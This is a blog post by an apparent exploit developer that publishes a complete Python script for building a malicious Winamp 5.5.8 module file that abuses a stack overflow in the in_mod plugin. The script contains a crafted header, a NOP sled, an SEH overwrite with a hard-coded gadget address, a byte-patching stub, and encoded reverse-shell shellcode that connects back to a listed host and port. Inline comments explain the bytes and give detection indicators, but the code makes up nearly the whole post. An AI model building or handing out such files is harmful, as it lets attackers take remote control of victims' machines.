Shut Up and Hack

I like reading more than writing, and, in fact, I don't write too much.

Dear Winamp...

Finally got time to finish what I started. A POC was already released at The Exploit Database Blog (without proper shellcode) here.

However, while developing our exploit we gave up on SEH and went straight for a direct EIP overwrite; yesterday I couldn't sleep and decided to finish cooking this version.

Have a look here: Winamp 5.5.8 (in_mod plugin) Stack Overflow Exploit (SEH).

Exploit Code:

#!/usr/bin/python
# finally got time to finish what I started...
# Winamp 5.5.8.2985 (in_mod plugin) Stack Overflow (SEH)
# WINDOWS XP SP3 EN Fully Patched
# Bug found by http://www.exploit-db.com/exploits/15248/
# POC and Exploit by @fdiskyou
# e-mail: rui at deniable.org
# This POC was already released here (without proper shellcode): http://www.exploit-db.com/winamp-5-58-from-dos-to-code-execution/
# We later gave up on SEH and went straight for a direct EIP overwrite; yesterday I couldn't sleep and decided to finish cooking this version.
# Further References:
# http://www.exploit-db.com/winamp-exploit-part-2/
# http://www.exploit-db.com/exploits/15287/
# Special thanks to Mighty-D, Ryujin and all the Exploit-DB Dev Team.

# Crafted file header.  The bytes decode as the ASCII magic "MTM\x10" followed by
# "SpaceTrack(kosmosis)" (20 bytes, presumably the song-name field) and ten more
# header bytes carried over from the original PoC.  Presumably these are the
# MTM module header fields in_mod parses before it reaches the overflowing
# read — TODO confirm against the MTM format spec.  Detection note: the file
# is recognised by this magic, not by its extension, so magic-based file typing
# is what will classify the sample correctly.
header = "\x4D\x54\x4D\x10\x53\x70\x61\x63\x65\x54\x72\x61\x63\x6B\x28\x6B\x6F\x73\x6D\x6F\x73\x69\x73\x29\xE0\x00\x29\x39\x20\xFF\x1F\x00\x40\x0E"
# 32 more header bytes: the pair "\x04\x0C" repeated 16 times.
header += "\x04\x0C" * 16
# 58331 bytes of NOP (0x90) padding between the header and the SEH record.
# Detection note: a uniform 0x90 run of this length inside a ~60 KB module
# file is a cheap static indicator for this sample.
nopsled = "\x90" * 58331

# windows/shell_reverse_tcp LHOST=192.168.33.114 LPORT=4444 (script kiddie unfriendly)
# bad chars: \x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x10\x11\x12\x13\x0a\x0b\x0c\x0d\x0e\x0f
# Connect-back payload as emitted by the Metasploit generator named above.  After
# a 7-byte prologue the bytes sit almost entirely in the 0x30-0x5a range, which
# looks like an alphanumeric encoder's output with a GetPC stub in front — the
# encoder is not named here, so treat that as an assumption.  Detection note:
# the callback host/port named in the comment above are the network indicator
# for this sample; the plaintext LHOST/LPORT comment is itself a usable string
# signature when the generator script, rather than the .mtm, is what is found.
shellcode = ("\x89\xe1\xda\xd7\xd9\x71\xf4\x5e\x56\x59\x49\x49\x49\x49\x43"
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x56\x58\x34"
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
"\x50\x38\x41\x43\x4a\x4a\x49\x4d\x38\x4d\x59\x43\x30"
"\x43\x30\x45\x50\x43\x50\x4d\x59\x4b\x55\x56\x51\x58\x52\x43"
"\x54\x4c\x4b\x50\x52\x50\x30\x4c\x4b\x56\x32\x54\x4c\x4c\x4b"
"\x51\x42\x54\x54\x43\x42\x51\x38\x54\x4f\x58\x37\x51"
"\x5a\x56\x46\x50\x31\x4b\x4f\x56\x51\x49\x50\x4e\x4c\x47\x4c"
"\x43\x51\x43\x4c\x43\x32\x56\x4c\x47\x50\x4f\x31\x58\x4f\x54"
"\x4d\x58\x47\x5a\x42\x5a\x50\x51\x42\x50\x57\x4c\x4b"
"\x51\x42\x54\x50\x4c\x4b\x47\x32\x47\x4c\x45\x51\x4e\x30\x4c"
"\x4b\x47\x30\x43\x48\x4d\x55\x4f\x30\x43\x44\x50\x4a"
"\x4e\x30\x50\x50\x4c\x4b\x50\x48\x54\x58\x4c\x4b\x56\x38\x47"
"\x50\x43\x31\x4e\x33\x4b\x53\x47\x4c\x50\x49\x4c\x4b\x50\x34"
"\x4c\x4b\x43\x31\x49\x46\x50\x31\x4b\x4f\x49\x50\x4e"
"\x4c\x49\x51\x58\x4f\x54\x4d\x43\x31\x49\x57\x47\x48\x4b\x50"
"\x52\x55\x4b\x44\x43\x33\x43\x4d\x4c\x38\x47\x4b\x43\x4d\x47"
"\x54\x54\x35\x4b\x52\x51\x48\x56\x38\x56\x44\x43\x31"
"\x49\x43\x43\x56\x4c\x4b\x54\x4c\x50\x4b\x4c\x4b\x50\x58\x45"
"\x4c\x45\x51\x58\x53\x4c\x4b\x54\x44\x4c\x4b\x45\x51\x58\x50"
"\x4d\x59\x50\x44\x56\x44\x51\x4b\x51\x4b\x45\x31\x56"
"\x39\x50\x5a\x56\x31\x4b\x4f\x4d\x30\x56\x38\x51\x4f\x50\x5a"
"\x4c\x4b\x54\x52\x5a\x4b\x4d\x56\x51\x4d\x52\x48\x47\x43\x50"
"\x32\x43\x30\x52\x48\x52\x57\x52\x53\x50\x32\x51\x4f"
"\x51\x44\x52\x48\x50\x4c\x54\x37\x47\x56\x54\x47\x4b\x4f\x49"
"\x45\x4e\x58\x4c\x50\x45\x51\x43\x30\x43\x30\x56\x49"
"\x51\x44\x56\x30\x52\x48\x56\x49\x4d\x50\x52\x4b\x43\x30\x4b"
"\x4f\x58\x55\x50\x50\x50\x50\x50\x50\x50\x50\x51\x50\x56\x30"
"\x51\x50\x56\x30\x52\x48\x4b\x5a\x54\x4f\x4b\x50\x4b"
"\x4f\x49\x45\x4b\x39\x58\x47\x43\x58\x4f\x30\x4f\x58\x47\x51"
"\x54\x32\x45\x38\x45\x52\x43\x30\x54\x51\x51\x4c\x4c\x49\x5a"
"\x46\x52\x4a\x52\x30\x51\x46\x45\x38\x4d\x49\x4e\x45"
"\x43\x44\x45\x31\x4b\x4f\x58\x55\x45\x38\x43\x53\x52\x4d\x45"
"\x34\x45\x50\x4b\x39\x5a\x43\x56\x37\x56\x37\x50\x57\x56\x51"
"\x4c\x36\x52\x4a\x50\x59\x51\x46\x5a\x42\x4b\x4d\x45"
"\x36\x4f\x37\x51\x54\x47\x54\x47\x4c\x45\x51\x43\x31\x4c\x4d"
"\x51\x54\x56\x44\x52\x30\x49\x56\x43\x30\x51\x54\x51\x44\x56"
"\x30\x50\x56\x50\x56\x47\x36\x50\x56\x50\x4e\x50\x56"
"\x51\x46\x56\x33\x56\x36\x52\x48\x52\x59\x58\x4c\x47\x4f\x4c"
"\x46\x4b\x4f\x58\x55\x4d\x59\x4b\x50\x50\x4e\x50\x56"
"\x4b\x4f\x56\x50\x43\x58\x45\x58\x4b\x37\x45\x4d\x43\x50\x4b"
"\x4f\x58\x55\x4f\x4b\x4c\x30\x4f\x45\x4e\x42\x56\x36\x52\x48"
"\x4e\x46\x4c\x55\x4f\x4d\x4d\x4d\x4b\x4f\x47\x4c\x43"
"\x36\x43\x4c\x45\x5a\x4d\x50\x4b\x4b\x4d\x30\x43\x45\x43\x35"
"\x4f\x4b\x51\x57\x45\x43\x43\x42\x52\x4f\x43\x5a\x45\x50\x51"
"\x43\x4b\x4f\x58\x55\x45\x5a")

# In-place byte patcher that runs ahead of the encoded shellcode.  It copies esp
# into ebx, adds 0x34E9 (the imm32 0xFFFFCB17 is -0x34E9), nets a further +0x19
# (add 0x3B, sub 0x22), and then repeats one pattern 17 times: subtract a
# constant from the byte at [ebx], inc ebx, subtract another constant from the
# next byte, then advance ebx by 0x3F-0x16 = 0x29.  Each two-byte patch thus
# starts 42 bytes after the previous one.  Why those bytes need rewriting is
# not stated in this file — presumably the plugin alters the buffer at a fixed
# stride while loading it and this undoes that before the payload runs; TODO
# confirm against the write-up linked in the header.  The "\x90" * 4 / * 6 runs
# spliced between steps do not touch ebx; they only shift where the stub's own
# instructions sit, presumably to keep them clear of that same stride —
# unverified.
prepare_shellcode = "\x90" * 40
prepare_shellcode += "\x90\x33\xDB"             # xor ebx,ebx
prepare_shellcode += "\x54\x5B"                 # push esp / pop ebx  (ebx = esp)
prepare_shellcode += "\x81\xEB\x17\xCB\xFF\xFF" # sub ebx,-34E9  (imm32 0xFFFFCB17 == -0x34E9, so ebx += 0x34E9)
prepare_shellcode += "\x83\xc3\x3B"             # add ebx,3B
prepare_shellcode += "\x83\xEB\x22"             # sub ebx,22  (net +0x19 with the add above)
prepare_shellcode += "\x80\x2B\xDA"             # sub byte ptr ds:[ebx],0da  (first of 17 two-byte patches)
prepare_shellcode += "\x43"                     # inc ebx
prepare_shellcode += "\x80\x2B\xDA"             # sub byte ptr ds:[ebx],0da
prepare_shellcode += "\x83\xc3\x3F"             # add ebx,3F  (with the sub 0x16 that follows: +0x29 to the next pair)
prepare_shellcode += "\x83\xEB\x16"             # sub ebx,16
prepare_shellcode += "\x90" * 6
prepare_shellcode += "\x80\x2B\xC2"             # sub byte ptr ds:[ebx],0c2
prepare_shellcode += "\x43"                     # inc ebx
prepare_shellcode += "\x80\x2B\xBE"             # sub byte ptr ds:[ebx],0be
prepare_shellcode += "\x83\xc3\x3F"             # add ebx,3F
prepare_shellcode += "\x83\xEB\x16"             # sub ebx,16
prepare_shellcode += "\x80\x2B\xC1"             # sub byte ptr ds:[ebx],0c1
prepare_shellcode += "\x43"                     # inc ebx
prepare_shellcode += "\x80\x2B\xBF"             # sub byte ptr ds:[ebx],0BF
prepare_shellcode += "\x83\xc3\x3F"             # add ebx,3F
prepare_shellcode += "\x83\xEB\x16"             # sub ebx,16
prepare_shellcode += "\x80\x2B\xC8"             # sub byte ptr ds:[ebx],0c8
prepare_shellcode += "\x43"                     # inc ebx
prepare_shellcode += "\x80\x2B\xB9"             # sub byte ptr ds:[ebx],0B9
prepare_shellcode += "\x83\xc3\x3F"             # add ebx,3F
prepare_shellcode += "\x90" * 4
prepare_shellcode += "\x83\xEB\x16"             # sub ebx,16
prepare_shellcode += "\x80\x2B\xCA"             # sub byte ptr ds:[ebx],0CA
prepare_shellcode += "\x43"                     # inc ebx
prepare_shellcode += "\x80\x2B\xD9"             # sub byte ptr ds:[ebx],0D9
prepare_shellcode += "\x83\xc3\x3F"             # add ebx,3F
prepare_shellcode += "\x83\xEB\x16"             # sub ebx,16
prepare_shellcode += "\x80\x2B\xB7"             # sub byte ptr ds:[ebx],0B7
prepare_shellcode += "\x43"                     # inc ebx
prepare_shellcode += "\x80\x2B\xB9"             # sub byte ptr ds:[ebx],0B9
prepare_shellcode += "\x83\xc3\x3F"             # add ebx,3F
prepare_shellcode += "\x83\xEB\x16"             # sub ebx,16
prepare_shellcode += "\x80\x2B\xC1"             # sub byte ptr ds:[ebx],0c1
prepare_shellcode += "\x43"                     # inc ebx
prepare_shellcode += "\x80\x2B\xBF"             # sub byte ptr ds:[ebx],0BF
prepare_shellcode += "\x90" * 4
prepare_shellcode += "\x83\xc3\x3F"             # add ebx,3F
prepare_shellcode += "\x83\xEB\x16"             # sub ebx,16
prepare_shellcode += "\x80\x2B\xBC"             # sub byte ptr ds:[ebx],0BC
prepare_shellcode += "\x43"                     # inc ebx
prepare_shellcode += "\x80\x2B\xD6"             # sub byte ptr ds:[ebx],0D6
prepare_shellcode += "\x83\xc3\x3F"             # add ebx,3F
prepare_shellcode += "\x83\xEB\x16"             # sub ebx,16
prepare_shellcode += "\x80\x2B\xCA"             # sub byte ptr ds:[ebx],0CA
prepare_shellcode += "\x43"                     # inc ebx
prepare_shellcode += "\x80\x2B\xDA"             # sub byte ptr ds:[ebx],0da
prepare_shellcode += "\x83\xc3\x3F"             # add ebx,3F
prepare_shellcode += "\x83\xEB\x16"             # sub ebx,16
prepare_shellcode += "\x80\x2B\xC4"             # sub byte ptr ds:[ebx],0c4
prepare_shellcode += "\x43"                     # inc ebx
prepare_shellcode += "\x90" * 4
prepare_shellcode += "\x80\x2B\xB6"             # sub byte ptr ds:[ebx],0B6
prepare_shellcode += "\x83\xc3\x3F"             # add ebx,3F
prepare_shellcode += "\x83\xEB\x16"             # sub ebx,16
prepare_shellcode += "\x80\x2B\xC4"             # sub byte ptr ds:[ebx],0c4
prepare_shellcode += "\x43"                     # inc ebx
prepare_shellcode += "\x80\x2B\xBB"             # sub byte ptr ds:[ebx],0BB
prepare_shellcode += "\x83\xc3\x3F"             # add ebx,3F
prepare_shellcode += "\x83\xEB\x16"             # sub ebx,16
prepare_shellcode += "\x80\x2B\xB7"             # sub byte ptr ds:[ebx],0B7
prepare_shellcode += "\x43"                     # inc ebx
prepare_shellcode += "\x80\x2B\xD3"             # sub byte ptr ds:[ebx],0D3
prepare_shellcode += "\x83\xc3\x3F"             # add ebx,3F
prepare_shellcode += "\x83\xEB\x16"             # sub ebx,16
prepare_shellcode += "\x90" * 6
prepare_shellcode += "\x80\x2B\xBB"             # sub byte ptr ds:[ebx],0BB
prepare_shellcode += "\x43"                     # inc ebx
prepare_shellcode += "\x80\x2B\xD8"             # sub byte ptr ds:[ebx],0D8
prepare_shellcode += "\x83\xc3\x3F"             # add ebx,3F
prepare_shellcode += "\x83\xEB\x16"             # sub ebx,16
prepare_shellcode += "\x80\x2B\xB7"             # sub byte ptr ds:[ebx],0B7
prepare_shellcode += "\x43"                     # inc ebx
prepare_shellcode += "\x80\x2B\xD4"             # sub byte ptr ds:[ebx],0d4
prepare_shellcode += "\x83\xc3\x3F"             # add ebx,3F
prepare_shellcode += "\x83\xEB\x16"             # sub ebx,16
prepare_shellcode += "\x80\x2B\xBC"             # sub byte ptr ds:[ebx],0BC
prepare_shellcode += "\x43"                     # inc ebx
prepare_shellcode += "\x80\x2B\xB4"             # sub byte ptr ds:[ebx],0B4
prepare_shellcode += "\x90" * 6
prepare_shellcode += "\x83\xc3\x3F"             # add ebx,3F
prepare_shellcode += "\x83\xEB\x16"             # sub ebx,16
prepare_shellcode += "\x80\x2B\xBF"             # sub byte ptr ds:[ebx],0BF
prepare_shellcode += "\x43"                     # inc ebx
prepare_shellcode += "\x80\x2B\xD5"             # sub byte ptr ds:[ebx],0D5
prepare_shellcode += "\x83\xc3\x3F"             # add ebx,3F
prepare_shellcode += "\x83\xEB\x16"             # sub ebx,16
prepare_shellcode += "\x80\x2B\xCC"             # sub byte ptr ds:[ebx],0CC
prepare_shellcode += "\x43"                     # inc ebx
prepare_shellcode += "\x80\x2B\xC9"             # sub byte ptr ds:[ebx],0C9  (last patch; execution then slides into the NOPs below)
prepare_shellcode += "\x90"*305                 # 305 NOPs of slack before the encoded shellcode begins

# Overwritten SEH record.  nseh: "\xeb\x30" is `jmp short +0x30`, with two NOPs
# filling the rest of the 4-byte slot.  seh: 0x72D1283F stored little-endian;
# per the comment it is a pop/pop/ret gadget in msacm32.drv on Windows XP SP3
# EN.  Because that is a hard-coded absolute address in one specific module
# build, the exploit is pinned to that OS build and language — a different
# msacm32.drv breaks it.  On later Windows versions SEHOP and module ASLR defeat
# this handler-overwrite technique; on XP the gadget presumably comes from a
# module without a SafeSEH table — TODO confirm.
nseh = "\xeb\x30\x90\x90"
seh = "\x3f\x28\xd1\x72"     # 0x72D1283F - ppr - msacm32.drv - Windows XP SP3 EN
# Final file image, in order: header, 58331-byte NOP sled, nSEH, SEH, the
# byte-patcher stub, the encoded shellcode, then 100 trailing NOPs.
payload = header + nopsled + nseh + seh + prepare_shellcode + shellcode + "\x90" * 100

# Write the crafted module to disk (roughly 60 KB, dominated by the sled).
# NOTE(review): the file is opened in text mode ("w"); on Windows that would
# rewrite any 0x0a byte as 0x0d 0x0a, and this only works because 0x0a is in the
# bad-char list above and none of the other literals in this file contain it —
# "wb" would make that guarantee explicit.  `file` also shadows the Python 2
# builtin of the same name, and a `with` block would close the handle on error;
# both left as written.  Detection note: the fixed output name "sploit.mtm" is
# a trivial but free indicator for this generator.
file = open("sploit.mtm", "w")
file.write(payload)
file.close()

# Python 2 print statement; this script does not run under Python 3 as written.
print "sploit.mtm file generated successfuly"